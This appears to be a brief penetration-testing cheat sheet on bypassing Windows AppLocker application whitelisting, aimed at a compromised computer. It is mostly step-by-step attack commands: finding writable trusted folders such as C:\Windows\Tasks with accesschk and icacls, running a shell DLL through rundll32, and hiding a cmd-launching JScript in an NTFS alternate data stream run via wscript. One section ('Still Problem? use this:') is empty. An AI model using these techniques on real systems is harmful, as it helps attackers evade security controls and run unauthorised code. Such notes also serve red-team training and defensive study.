AppLocker

Trusted Folders
need administrator cmd
and tools from sysinternalsSuite
accesschk.exe "<current user>" C:\Windows -wus
icacls.exe C:\Windows\Tasks
copy the binary to allowed directory. then run that binary.
Bypass with DLL
rundll32 c:\windows\tasks\shell.dll,run
Alternate Data Stream
save this to shell.js
var manggo = new ActiveXObject("WScript.Shell");
var pineapple = manggo.Run("cmd.exe");
Find the TRUSTED FOLDER that able to W & X by current user
type shell.js > "<trusted directory with txt file>\file.txt:shell.js"
# verify the alternate data stream
dir /r "<file name>"
# file.txt:shell.js:$DATA
Execute the alternate data stream
wscript "<directory>\file.txt:shell.js"
Other technique
check third party script execution which is must be pre-installed in the compromised computer:
Python
Still Problem?
use this:
reference:
https://securitycafe.ro/2023/05/02/bypassing-application-whitelisting/
Last updated